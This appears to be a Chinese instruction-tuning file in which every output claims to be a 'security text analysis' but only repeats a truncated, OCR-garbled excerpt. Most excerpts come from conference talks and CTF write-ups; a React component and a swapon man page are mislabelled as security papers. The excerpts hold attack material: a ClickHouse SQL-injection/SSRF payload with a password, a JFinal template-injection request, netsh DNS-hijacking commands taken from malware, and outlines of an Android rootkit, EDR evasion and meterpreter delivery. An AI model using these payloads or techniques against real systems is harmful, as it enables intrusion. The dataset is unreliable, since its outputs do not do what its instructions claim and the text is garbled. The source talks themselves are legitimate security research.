{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Attacking BaseStations Hendrik Schmidt <hschmidt@ernw.de> / @hendrks_ Brian Butterly <bbutterly@ernw.de> / @BadgeWizard 2 Who we are o Old-school network geeks, working as security researchers for o Germany based ERNW GmbH o Independent o Deep technical knowledge o Structured (assessment) approach o Business reasonable recommendations o We understand corporate o Blog: www.insinuator.net o Conference: www.troopers.de 3 Motivation o The 4G standard introduces a lot of new technologies providing modern services to the customer. o This includes features as VoLTE, SON, ..Trust and optional controls o BaseStations are the big (and small) antennas in the field o With our research we want to bring visibility to o How the environment works o What providers do o What vendors do 4 5 Introduction A 4G/LTE Telecommunication Network 6 4G Core eUTRAN UE eNodeB MME PDN-GW Serv-GW HSS IMS S1-MME S1-U OSS S1-MME IP Network 7 Typical Environment? Source: worldlte.blogspot.com 8 Typical Environment? 9 The Idea 1. Understand BaseStation Setup 2. Purchase an old BaseStation out of the field 3. Get BS running in an emulated environment 4. Perform an evaluation of configuration & security 10 What we need: Basestation Physical Setup o Base Band Unit (BBU) o Usually standing on the ground o Including Power Distribution Unit (PDU) and Power Supply Unit (PSU) o Remote Radio Head/Unit (RRH/RRU) o May be placed on the cell mast or on the ground o Antenna o Come in various shapes and sizes o Nowadays often vector antennas o All active parts are interconnected o BBU, RRU, sensors, power supply, vents 11 o Components run on -48V o Not +-48V (96V differential) o Basically just 48V connected the other way round o Basically receives raw RF signals via Fiber and sends them out via Copper o Towards the antenna o Usually capable of serving a specific frequency band Power Supply RRU 12 o Frame for holding power unit and functional blades o Sometimes have a backplane for interconnection between component", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMOC CTF MOC 前言 Games double sqli & Solved & #SQL #ClickHouse Unsecure Blog & Solved & #JFinal #表达式注入 Sp-Auth & Unsolved & #Spring #OAuth劫持 #CSRF and RCE ? 后记 前言 Web Wirteup 如下 Games double sqli & Solved & #SQL #ClickHouse 首先进入题目有种 sqli-labs 的既视感在后面加上了单引号报错了 通过搜索不难发现这个是 ClickHouse 的报错简单浏览下官方文档构造一个联合查询帮助我们回显报错太难看了 -1 union all select 'a'; 接着使用 user() 函数简单看了下当前用户为 user_02 然后测试了下几个函数发现这个用户能干的事情太少了通过目录扫描发现存在一个路径 files 这里之后@堆堆,告诉我这地方存在目录跨越可以直接读文件了. /files9/ 接下来就是信息搜集了不一会就传来了好消息找到了一个数据库的初始文件路径为 files9/var/lib/clickhouse/access/xxxx.sql 就这样我们便得到了一个有权限的用户 user_01 和其密码 e3b0c44298fc1c149afb 并且得到了flag所在的库名和表名. 接下来通过阅读文档发现 clickhouse 有两个很有意思的地方这两个姿势合起来恰好可以形成一个需要授权的 SSRF 执行SQL 语句的功能 HTTP Interface | ClickHouse Documentation url | ClickHouse Documentation url这个函数可以帮助我们发起一个 http 请求而 clickhouse 自带一个 http 的服务用于执行 SQL 语句 虽然文档中给的大多鉴权执行SQL语句大多都是 POST 请求而 url 本身感觉只支持 GET 请求(未测试)但是实际测试下来完全 是可以只使用 GET 请求就完成授权操作以及 SQL 语句的执行 见如下 payload flag就到手了 Note -1 union all select * from url('http99127.0.0.1:8123/? user=user_01&password=e3b0c44298fc1c149afb&query=select * from ctf.flag', CSV, 'column1 String'); Unsecure Blog & Solved & #JFinal #表达式注入 题目展示如下 提取几个关键的信息  jdk8u301  flag的位置这应该是在注册表中可能需要文件读取或者是命令执行导出注册表 首先第一步弱口令 111111 进后台没有什么需要说的对后台功能进行测试之后发现存在一个模板渲染的洞对着官方文档 学学,构造如下包 POST /admin/blog/preview HTTP/1.1 Host: 39.105.169.140:30000 Content-Length: 53 DNT: 1 X-Requested-With: XMLHttpRequest Content-Type: application/x-99-form-urlencoded; charset=UTF-8 Cookie: sessionId=4ccdd401322541cf94aaf6ec63aa41fb Connection: close blog.title=123&blog.id=2&blog.content=#set(x=1*1)9x) 这里我们用到了两个语法  #set() 用于赋值  9) 对象的引用 一开始有一个知识盲区的地方不知道怎么生成对象比如 thymeleaf 模板注入可以使用 T() 来生成一个对象但是这个一开始 确实没啥思路 在解决这个问题之前其实还有一个地方需要解决那就是这个 JFinal Enjoy 的内置黑名单这个黑名单对类以及方法名都 做了限制 相关类如下有想了解的师傅可以自己去看看这个类的静态代码块 com.jfinal.template.expr.ast.MethodKit 这里就给出方法名的黑名单 String[] ms = { \"getClass\", \"getDeclaringClass\", \"forName\", \"newInstance\", \"getClassLoader\", \"invoke\", 9 \"getMethod\", \"getMethods\", 9 \"getField\", \"getFields\", \"notify\", \"notifyAll\", ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 18 This is not the droid youre looking for Nicholas J. Percoco & Christian Papathanasiou Copyright Trustwave 2010 Agenda  About Us / Introduction  Introduction to Android  Motivations Behind this Work  Building a Linux Kernel Rootkit  Overcoming Hurdles  Introducing Mindtrick  The Android rootkit  Live Demo  Current Prevention  Conclusions Copyright Trustwave 2010 About Us Nicholas J. Percoco / Senior Vice President at Trustwave  15 Years in InfoSec / BS in CompSci  Built and Lead the SpiderLabs team at Trustwave  Interests:  Targeted Malware, AFack PrevenHon, Mobile Devices  Business / Social Impact Standpoint Chris0an Papathanasiou / Security Consultant at Trustwave  8 Years in InfoSec / MSc in InfoSec / MEng in ChemEng  Interests:  Rootkits/AnH-Rootkit detecHon, Algorithmic Trading, and Web ApplicaHon Security Copyright Trustwave 2010 Introduction  Android is a so7ware stack for mobile devices  60,000 phones running Android ship every day  Ranks 4th most popular smart phone device plaSorm  Not much research around rootkits on mobile devices  Android == Linux == almost 20 yr old Open Source OS  Very established body of knowledge in Linux Rootkits  We created a kernel-level Android rootkit  Loadable Kernel Module  AcHvated via a Trigger number Copyright Trustwave 2010 Introduction to Android  The Model Source: Google Copyright Trustwave 2010 Introduction to Android  Linux Kernel  Based upon the Linux 2.6.x kernel  Hardware AbstracHon Layer  Offers:  Memory Management  Process Management  Security  Networking  Android PlaSorm sits atop of the Kernel  This is where our rootkit lives (more later) Copyright Trustwave 2010 Introduction to Android  Libraries  Libraries == Most of Androids Core Func0onality  Libraries of most Interest:  SQLite  main storage/retrieval (calls/SMS records)  Webkit  browser funcHonality  SSL  crypto  Ideas/Hints:  What if you can read SMS messages?  How about intercepHng browser sessions?  Can you hook the PRNG with staHc low numbers? ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n云安全体系下的安全技术对抗 演讲人: 张文君(Junzz) 关于演讲者 张文君 (Junzz) 金山网络安全研究员 负责金山毒霸内核驱动和顽固病毒查杀相关开发 对严重安全事件快速分析和回应有丰富经验 曾处理过众多大陆知名流行病毒极虎,鬼影,杀破网,淘宝大盗,极光,超级 工厂,AV 终结者等. 云对抗-手法 断网 -切断和云端服务器的联络 -修改查询结果 变形 -MD5变形 -膨胀自身 Misc -BootKit -BatVbsMsi 客户端 批处理/脚本 修改DNS 本地路由表 IP组策略 修改TcpEntry LSP劫持 Hook TCPIP 云端 NDIS中间层 断网 阻断交互 本地添加IP地址 修改查询 结果 MD5变形 膨胀自身 变形 云端 客户端 修改自身 BAT VBS MBR MSI Misc 云端 客户端 改头换面 RootKit 断网1-批处理断网 发现时间2009年4月 手法 -发现云查杀进程关闭网络连接 不足 -无针对性所有进程的网络都 断了 -无隐藏性易被用户发觉 断网2-修改DNS(a) 发现时间2010年6月 下载源 http://andy.cd/down/****/20101.asp 手法 修改DNS服务器的方式来阻止用户访问安全站点 细节  通过命令行 netsh interface ip set dns name=本地连接\" source=staticaddr=122.225.**.***register=PRIMARY netsh interface ip add dns \"本地连接\" 60.191.**.** 2\" 修改当前网络连接DNS服务器该服务器会将安全类 站点域名对应ip解析为127.0.0.1 断网2-修改DNS(b) 黑的DNS 如图修改为该DNS后 ping 安全软件的IP返回 的均返回127.0.0.1 断网3-添加本地路由表(a) 手法 获取安全站点ip 将这些IP记录添加到本地路由表 路由表记录中Gateway值设置为本地ip+1 发现时间: 2010.5月初 断网3-添加本地路由表(b) 注红色部分为病毒所添 加的记录  如图染毒环境中通过 route print 命令查看 当前路由记录 断网3-添加本地路由表(c) 技术核心实现部分 获取到安全站点 ip并将ip 最后一字段设为 0 获取到本机 ipip 最后一字段加 1 将 这 两 个 地 址 分 别 填 充 到 dwForwardDest 和 dwForwardNextHop 域 CreateIpForwardEntry 在本地路由中新建安全站点ip 记录 断网4-设置IP组策略(a) 发现日期: 2010.4.22 下载源http://117.41.167.xxx:1024/QvodPlayer.exe 病毒通过添加IP安全策略过滤安全站点 IP 在染毒环境下ping 安软的网址均返回 Destination host unreachable 手法 断网4-设置IP组策略(b) 如图组策略被修改后 断网5-VB模拟测试程序(a) 发现日期: 2010.4.22 GetExtendedTcpTable 获取指定进程 TCP 链接 SetTCPEntry 将获取的TCP 链接状态置 为Delete 循环以上流程杀软在重连服务端后TCP 状态再次 被改 手法 样本导致的现象所有指定进程网络连接中断 如图测试扫描的日志中出现大量文件 Net Detect Failed 同时杀毒病毒库无法升级卫士流量监控失效. 断网5-VB模拟测试程序(b) 断网5-VB模拟测试程序(c) 实现原理 GetExtendedTcpTable 获取当前 TCP 的 ExTable; 根据Pid得到进程的全路径 内置表中存放常见安全软件的进程名 和当前 TCP 连接的进程比对 相同则用SetTcpEntry 将 state设置为MIB_TCP_STATE_DELETE_TCB 设置定时器不断枚举ExTable 和ReSet 断网6-本地添加IP地址(a) 发现日期: 2010.4月初 手法内置在某远控中将要屏蔽的IP添 加到本地临时的IP条目 GetInterfaceInfo AddIPAddress 断网6-本地添加IP地址(b) 源码: 断网7-Hook Tcpip分发函数(a) 下载源 http://qvod.du***.com/qvod/qvod.exe 发现日期2010.5.30 手法 病毒驱动对TCPIP 的IRP分发函数进行替换实现对当前 网络通信中域名的比对并从ring3程序中传入要过滤的 网址黑名单的哈希当发现哈希相同的访问请求则屏蔽 同时病毒还Hook了Fsd的分发函数保护自己的文件 不被打开和枚举到 断网7-Hook T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOne bite and all your dreams will come true: Analyzing and Attacking Apple Kernel Drivers X(aolon& Ba( & M(n Spar)) Zhen& 1 Xiaolong Bai Alibaba Security Engineer Ph.D. graduated from Tsinghua University Published papers on the top 4: S&P, Usenix Security, CCS, NDSS Twitter, Weibo, Github: bxl1989 Min (Spark) Zheng Alibaba Security Expert Ph.D. graduated from The CUHK Twitter@SparkZheng Weibo@spark 2 1 Overview 2 New vulns in Apple drivers 3 Obstacles in analyzing Apple drivers 3 4 Ryuk: a new static analysis tool to analyze drivers 5 Ryuk-Fuzz: combine fuzzing with static analysis 6 Conclusions Overview 4 Every driver is a kernel extension (.kext) sharing the same space with the kernel Location of driver binaries: On macOS: /System/Library/Extensions On iOS: integrated with kernel in kernelcache 5 Userclient: kernel objects for drivers to provide service to programs in userspace Userclient is the interface between user-space applications and devices 6 In order to provide services, userclients need to implement several callback methods:  externalMethod: Provide methods that can be called in user- space  clientMemoryForType: Share memory with apps in user- space  registerNotificationPort: Allow user-space app to register for notifications  clientClose: Close connection with user-space app   7 externalMethod(uint32_t selector, IOExternalMethodArguments *arguments, IOExternalMethodDispatch *dispatch, OSObject *target, void *reference); Callback to provide methods to userspace program selector: to select method in userclient arguments: arguments passed to the selected method dispatch: a struct representing the method to be called target: the target userclient for the method to be called on reference: reference to send results back to userspace program 8 Despite of strict sandbox restriction, some userclients are still be accessible to sandboxed apps on iOS: IOHIDLibUserClient IOMobileFramebufferUserClient IOSurfaceAcceleratorClient AppleJPEGDriverUserClient IOAccelDevice2,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nswapon === 激活Linux系统中交换空间 ## 补充说明 **swapon命令** 用于激活Linux系统中交换空间Linux系统的内存管理必须使用交换区来建立虚拟内存 ### 语法 ```shell swapon(选项)(参数) ``` ### 选项 ```shell -a将/etc/fstab文件中所有设置为swap的设备启动为交换区 -h显示帮助 -p<优先顺序>指定交换区的优先顺序 -s显示交换区的使用状况 -V显示版本信息 ``` ### 参数 交换空间指定需要激活的交换空间可以是交换文件和交换分区如果是交换分区则指定交换分区对应的设备文件 ### 实例 ```shell mkswap -c /dev/hdb4 -c是检查有无坏块 swapon -v /dev/hdb4 swapon -s Filename type Size Used Priority /dev/hda5 partition 506008 96 -1 /dev/hdb4 partition 489972 0 -2 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Stage 1 ## Description > Decipher this to have the key to the next stage. > > `aHR0cHM6Ly9ybmQuZWJheS5jby5pbC9yaWRkbGUvbXpmYmFiZXdjZXlxeGFsdXIv` ## Solution This is an easy warm-up question. We decode the string as base-64 and get: ```console root@kali:/media/sf_CTFs/ebay/1# echo aHR0cHM6Ly9ybmQuZWJheS5jby5pbC9yaWRkbGUvbXpmYmFiZXdjZXlxeGFsdXIv | base64 -d https://rnd.ebay.co.il/riddle/mzfbabewceyqxalur/ ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLAN PROTOCOL ATTACKS PART 1 - ARP RELOADED Presented at Defcon 15 Las Vegas, NV 2007 Jesse x30n DAguanno jesse[at]praetoriang.net / x30n[at]digrev.org Defcon 15 Las Vegas, NV August 2007 Jesse DAguanno (c) Copyright 2007 Praetorian Global, LLC Background  $whoami  Jesse x30n DAguanno  Director of Professional Services and Research - Praetorian Global  Lead Professional Services - Penetration Testing, Code audit, etc.  Lead Vulnerability Research Efforts  Team Captain / Researcher - Digital Revelation  Group of hackers who share stuff & beat other hackers in competitions  Usual suspects in Defcon CTF  Taken Defcon CTF title twice + Interz0ne CTF & toorcon rootwars  Invented techniques and coined the term Blackjacking  Didnt write the book Blackjacking 2 Defcon 15 Las Vegas, NV August 2007 Jesse DAguanno (c) Copyright 2007 Praetorian Global, LLC ARP - Background  Networked systems need a way to identify the layer 2 address of peers on the same network segment based on their protocol address  Enter the Address Resolution Protocol (ARP)  ARP allows a system to dynamically identify the hardware address (In our case MAC address) of a networked peer via its protocol address (IP address)  It does this by sending REQUEST packets to the network broadcast for any one with the IP were looking for  I.e Who has 192.168.1.100  The host with the matching IP sends a RESPONSE packet to the requester with its hardware address  I.e 192.168.1.100 is at 00:DF:1A:9C:A3:78  To reduce the amount of transactions required, hosts maintain an ARP cache of recently resolved MAC Address / IP Pairs  Else, each transaction would require an ARP lookup 3 Defcon 15 Las Vegas, NV August 2007 Jesse DAguanno (c) Copyright 2007 Praetorian Global, LLC ARP - Background  Anatomy of an ARP packet 4 Defcon 15 Las Vegas, NV August 2007 Jesse DAguanno (c) Copyright 2007 Praetorian Global, LLC  192.168.1.20 Requests the hardware address of 192.168.1.100 ARP Request 5 Defcon 15 Las Vegas, NV August 2007 Jesse DAgu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022/4/25 09:43 A blueprint for evading industry leading endpoint protection in 2022 | Vincent Van Mieghem https://vanmieghem.io/blueprint-for-evading-edr-in-2022/ 1/12 A blueprint for evading industry leading endpoint protection in 2022 MONDAY. APRIL 18, 2022 - 19 MINS EVASION OBFUSCATION About two years ago I quit being a full-time red team operator. However, it still is a field of expertise that stays very close to my heart. A few weeks ago, I was looking for a new side project and decided to pick up an old red teaming hobby of mine: bypassing/evading endpoint protection solutions. In this post, Id like to lay out a collection of techniques that together can be used to bypassed industry leading enterprise endpoint protection solutions. This is purely for educational purposes for (ethical) red teamers and alike, so Ive decided not to publicly release the source code. The aim for this post is to be accessible to a wide audience in the security industry, but not to drill down to the nitty gritty details of every technique. Instead, I will refer to writeups of others that deep dive better than I can. In adversary simulations, a key challenge in the initial access phase is bypassing the detection and response capabilities (EDR) on enterprise endpoints. Commercial command and control frameworks provide unmodifiable shellcode and binaries to the red team operator that are heavily signatured by the endpoint protection industry and in order to execute that implant, the signatures (both static and behavioural) of that shellcode need to be obfuscated. In this post, I will cover the following techniques, with the ultimate goal of executing malicious shellcode, also known as a (shellcode) loader: Home Blog Projects 2022/4/25 09:43 A blueprint for evading industry leading endpoint protection in 2022 | Vincent Van Mieghem https://vanmieghem.io/blueprint-for-evading-edr-in-2022/ 2/12 1. Shellcode encryption 2. Reducing entropy 3. Escaping the (local) AV sandbox 4. Import table o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSocial-Engineering Pentesting over Power lines Dave Kennedy (@Dave_ReL1K) Rob Simon (@KickenChicken57) http://www.secmaniac.com About Rob  Application Security Engineer, Fortune 1000  Penetration Tester  Source Code Analysis  Spare time plays with home automation gear  C/C++/C#  Also hugs.. About Me  Creator of the Social-Engineer Toolkit  Founder of DerbyCon  Author of new book from NoStarch Press on Metasploit  Back|Track Development Team  Exploit-DB Development Team  Exploit Writer  Penetration Tester  Chief Information Security Officer, Fortune 1000  I give hugs.. Before we starta slight detour Introduction on the Teensy  Originally covered by Adrian Crenshaw (irongeek)  Morphed into a weapon last year at Defcon.  The ability to emulate any keyboard and leverage full character sets with on-board storage. The Teensy Device Teensy, Teensy ++, Customized Motion Sensor Teensy (thnx. Garland) Lets walk through some basics  In order to get a binary to the system we need to convert it to keyboard-acceptable characters.  Our choice was leveraging binary to hex conversion methods. Conversely you could easily use base64. Some code Okay now we got some hex  Okay, now we have some hex We need a way to convert it back to a binary when its written to a file on the system through the teensy..  You could leverage vbs, we decided on PowerShell as its pretty much on every Windows XP instance and integrated into Vista and Windows 7 and cant be removed. Some more code Moving it to Teensy Moving it to Teensy Pt. 2 Bummer  So unfortunately, this method didnt work, after breaking it down to hex or base64, the file was above what the Teensy++ could handle.  So we looked at another alternative Shellcodeexec  Works on DEP/NX enabled systems by storing shellcode as +rwx.  Supports alphanumeric encoded payloads which means a meterpreter stager will be extremely small character wise. Testing it out  Custom compile shellcodeexec and convert to hex  Create a meterpreter reverse_tcp via alphan", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安全软件开发生命周期(S SDLC) 安全软件开发生命周期(S-SDLC) 与业务安全 与业务安全 自我介绍&培训 高级讲师 包悦忠  CWASP高级讲师包悦忠  专场培训 1 北京市朝阳区北四环中路8号 五洲皇冠国际酒店 会议室8 1 北京市朝阳区北四环中路8号 五洲皇冠国际酒店 会议室8 2 高级会员免费参与 软件安全保障 (软件安全  Software Security Assurance (软件安全 保障) is the process (流程) of ensuring that ) p ( ) g software is designed (设计) to operate at a level of security that is consistent with the level of security that is consistent with the potential harm that could result from the loss, inaccuracy, alteration, unavailability, or misuse of y, , y, the data and resources (数据和资源) that it uses, controls, and protects. it uses, controls, and protects. 摘自英文Wikipedia网站 软件安全保障 流程 软件安全保障 安全软件开发生命周期 (SSDLC) 关键要素 关键要素 需求 设计 开发 测试 部署和 运维 运维 风险评估  威胁建模 设计审核  安全开发  安全测试  安全加固  补丁管理  风险评估  设计审核  攻击面分析  代码审核  渗透测试  漏洞管理  安全事件响应  风险评估模板  威胁库  设计审核模板  公共安全组件  静态分析工具  动态分析工具  第三方渗透测 试  安全基线  扫描监控 管理工具 培训 政策 组织能力 培训政策组织能力 安全软件开发生命周期 (SSDLC) 流程与敏捷开发 流程与敏捷开发  环境初始 化  威胁建模  安全开发  持续集成  代码审核  更新设计 设计 开发 自动化部 持续测试 测试 部署  自动化部 署  安全运维  持续测试  渗透测试 软件安全保障 业界最佳实践 业界最佳实践 流程体系 持续改进  流程体系持续改进  固化实施评估改进再固化 固化实施评估改进再固化  设计安全 培训 意识和能力  培训意识和能力  管理层实际的可见的支持 管理层实际的可见的支持 软件安全保障 流程成熟度模型  Software Assurance Maturity Model (SAMM) 软件安全保障 流程成熟度模型  Microsoft SDL Optimization Model 软件安全保障 设计暨业务安全 软件安全保障 设计 务 威胁分析目的 威胁 安全 安全 安全 安全 威胁 分析 安全 设计 安全 开发 安全 测试 安全 部署 分析 设计 开发 测试 部署 数据流图 帐号 帐号 用户标识 帐号 邮件 代理服务 移动 客户端 第三方 邮件服务 用户标识 用户标识 邮件 帐号 邮件 邮件 用户标识 邮件 威胁模型 S.T.R.I.D.E. 仿冒 篡改 抵赖 信息泄露 拒绝服务 权限提升 数据流图 元素 仿冒 (Spoofi ng) 篡改 (Tampe ring) 抵赖 (Repudi ation) 信息泄露 (Informa tion Disclosur 拒绝服务 (Denial of Service) 权限提升 (Elevatio nof Privilege) Disclosur e) Service) Privilege) 外部交互方   处理过程       数据存储     数据流 数据流    威胁分析 帐号 I 帐号 用户标识 帐号 I I S S R 邮件 代理服务 移动 客户端 第三方 邮件服务 用户标识 用户标识 邮件 帐号 邮件 I D E I T S R 邮件 I 用户标识 邮件 I I 消减措施 方法技术手段 S 消减措施 方法 技术手段 S.T.R.I.D.E. 消减措施 方法技术手段 仿冒(Spoofing) 身份验证 (Authentication) 用户名/密码Cookie数字签 名挑战应答自定义 篡改(Tampering) 完整性(Integrity) 访问控制数字签名 抵赖(Repudiation) 防抵赖(Non Repudiation) 日志审计数字签名 Repudiation) 信息泄露(Information Disclosure) 保密性 (Confidentiality) 加密访问控制 拒", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom library import * from lib_attack import * import sys import numpy as np inputs, outputs, traces_orig = parse(sys.argv[1]) j = 0 flag = [0] * 16 for place in range(7620, 32500, 1626): traces = np.copy(traces_orig[:, place-400:place+400]) normalize(traces) align(traces, range(-50, 50)) traces = traces[:, :-40] print \"Flag so far\", flag #show_traces(traces) i = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15][j] j += 1 fb = find_byte(inputs, outputs, traces, i) for a in fb[:5]: print a print if fb[0][0] / fb[1][0] > 1.3: print \"\\t\\tFOUND BYTE %d: %02x\" % (i, fb[0][1]) flag[i] = fb[0][1] print flag", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n;LOGIN: JUNE 2006 SCRIPT KIDDIES WITH BRIEFCASES 51 A L E X A N D E R M U E N T Z script kiddies with briefcases T H E L E G A L S Y S T E M A S T H R E AT Alexander Muentz is both a sysadmin (since 1999) and a lawyer (admitted to the bar in Pennsylvania and New Jersey). Hed love to be a hacker public defender but has to earn his living helping law firms do electronic discovery.When hes not lawgeeking, he tries to spend time with his wife and his motorcy- cle. lex@successfulseasons.com Sysadmins have to know more than just their systems to do their jobs well. You have to understand people, finance, and your organizations business to spend its money wisely and protect it from all sorts of threats. IT people tend to think of threats using an preparation/attack/response framework, even when the threats are not malicious. You can then compare risks and allocate resources rationally. If threats can affect your systems, your users, or their data, they should be on your mind, even if most of the responsibility rests on some- one else. So why not think about legal processes in the same way? Some resemble existing attacks (hav- ing your systems seized is like a DOS attack), whereas others are unique. Ill discuss search war- rants, wiretaps, subpoenas, and discovery orders and their effects on users, systems, and data. Because this is a significantly deeper subject than can be explained in a small book, let alone a sin- gle article, Ill just be glossing over important nuances to give you an overview of the issues. This article only discusses U.S. federal law, but many state laws resemble federal ones. This isnt legal advice so much as it is the start of a conver- sation that you can finish with your IT staff or legal counsel. Lets talk about a few threats. The Search Warrant: Noisy,Disruptive,and Potentially Destructive A search warrant execution to an IT defender is like an invasion and a DOS attack wrapped up together. Law enforcement officers (LEOs) enter the area with enough", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Inside Look Into Defense Industrial Base (DIB) Technical Security Controls: How Private Industry Protects Our Country's Secrets James Kirk Outline  Background  DOD Agency Responsible for Interpretation and Enforcement  Security Control Development  Document Drafting and Approval  Testing of Security Controls  Enforcement  The fun stuff gaps in security controls Background/Disclaimer  What kind of data are we talking about?  National Industrial Security Program (NISP) Executive Order 12829 1.  National Industrial Security Program Policy Advisory Committee (NISPPAC)  National Industrial Security Program Operating Manual (NISPOM) 1. DoD 5220.22-M National Industrial Security Program: Operating Manual. DOD Agency Responsible for Interpretation and Enforcement  The Defense Security Service (DSS)  Agency Structure  Directorates (IS, CI, DISCO, and CDSE)  ODAA  Field Offices Basics of Certification and Accreditation (C&A)  What is C&A? 1., 2.  Certification  Accreditation  ISSP role  RDAA role  Enough background on the DSS, lets get into security controls 1. Industrial Security Field Operations (ISFO) Process Manual for the Certification and Accreditation Of Classified Systems under the National Industrial Security Program Operating Manual (NISPOM) and NIST 800-53. 2. Master System Security Plan (MSSP) Template for Peer-to-Peer Networks. Security Controls  Where do they originate from?  Linux controls 1.  Audit Areas 1./bin 2./usr/bin 3./etc 4./sbin 5./usr/sbin 6./var/audit 7./usr/local 8./opt 9./home 1. ISL 2007-01 Security Controls cont.  Linux cont. 1., 2.  DISA STIG vs NISPOM/DSS ISL 1. Standardization of Baseline Technical Security Configurations. 2. UNIX: Security Technical Implementation Guide. DISA STIG DSS NISPOM/ISL The SA will ensure audit data files have permissions of 640, or more restrictive. (2) Audit Trail Protection. The contents of audit trails shall be protected against unauthorized access, modification, or deletion. - Logon (unsuccessful and successf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOverwri'ng the Excep'on Handling Cache Pointer - Dwarf Oriented Programming James Oakley (Electron) Electron100 *noSPAM* gmail.com Rodrigo Rubira Branco (@BSDaemon) rodrigo *noSPAM* kernelhacking.com Sergey Bratus (Sbratus) Sergey *noSPAM* cs.dartmouth.edu Credits  This presenta'on combines ideas, research, discussions from the following personnel:  Sergey Bratus (Insecurity Theory, Exploi'ng the Hard- working Dwarf)  Meredith PaRerson (Langsec)  R.I.P. Len Sassaman (Langsec)  James Oakley (Exploi'ng the Hard-working Dwarf -> everything related to that, including Katana)  Rodrigo Rubira Branco (Exploi'ng the Hard-working Dwarf -> exploita'on, implementa'on details, research organiza'on) Mo'va'on  SoWware exploita'on is not generic anymore  There are different exploita'on primi'ves in different contexts  A modern exploita'on technique shows how to take advantage of those primi'ves  There are much more been computed then only the code that was wriRen (the target) Insecurity State  Treat all systems as compromised  There's no such thing as secure any more. -- Deborah PlunkeR, NSA Informa'on Assurance Directorate  Long weeks to short months before a security meltdown  Brian Snow, in December 2010 Does preven'on works?  Many ini'a'ves in trustworthy compu'ng  Many books on secure programming  Many academic publica'ons  Lots of test methods: fuzzing, binary analysis, you name it  And STILL the soWware SUCKS and is EXPLOITED!  And about the hardware? We have no idea how bad it is Insecurity is all about computa'on  Trustworthiness of a computer system is what the system can and cannot compute  Can the system decide if an input is invalid/unexpected/malicious & reject it?  Will program perform only expected computa'ons, or malicious ones too?  Exploita)on is se.ng up, instan)a)ng, and programming a weird machine  A part of the target is overwhelmed by craWed input and enters an unexpected but manipulable state Decidability  Computa'on has some unsolvable (un-decidable) proble", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 古典密码分析思路 CTF 中有关古典密码的题目通常是根据密文求出明文因此采用**唯密文攻击**居多基本分析思路总结如下 1. 确定密码类型根据题目提示加密方式密文字符集密文展现形式等信息 2. 确定攻击方法包括直接分析蛮力攻击统计分析等方法对于无法确定类型的特殊密码应根据其密码特性选用合适的攻击方法 3. 确定分析工具以在线密码分析工具与 Python 脚本工具包为主以离线密码分析工具与手工分析为辅 以上唯密文攻击方法的适用场景与举例如下 | 攻击方法 | 适用场景 | 举例 | | ---------- | ---------------------------------- | -------------------------------------- | | 直接分析法 | 由密码类型可确定映射关系的代换密码 | 凯撒密码猪圈密码键盘密码等 | | 蛮力攻击法 | 密钥空间较小的代换密码或置换密码 | 移位密码栅栏密码等 | | 统计分析法 | 密钥空间较大的代换密码 | 简单替换密码仿射密码维吉尼亚密码等 |", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 小案例card ``` import React from 'react' import './App.css' import Card from './Card' class App extends React.Component{ render(){ console.log(this.props) return ( <div className='app'> <Card title='Card title' more={<a href=\"http://baidu.com\">More</a>} > <p>每个人心中都有一团火 路过的人只看到烟</p> <p style={{textAlign:'right'}}>文森特梵高</p> </Card> </div> ) } } export default App ``` 可复用子组件 ``` import React from 'react' import PropTypes from 'prop-types' class Card extends React.Component{ render(){ return ( <div className='card'> <div className='header'> <h4>{this.props.title}</h4> <div className='more'>{this.props.more}</div> </div> <div className='main'> {this.props.children} </div> </div> ) } } Card.defaultProps = { title:'请输入标题', more:<a href=\"#\">More</a>, children:'请传入内容' } Card.propTypes = { title:PropTypes.string, more:PropTypes.element, children:PropTypes.oneOfType([ PropTypes.object, PropTypes.array, ]) } export default Card ```", "category": "text_analysis", "source": "security_papers"}
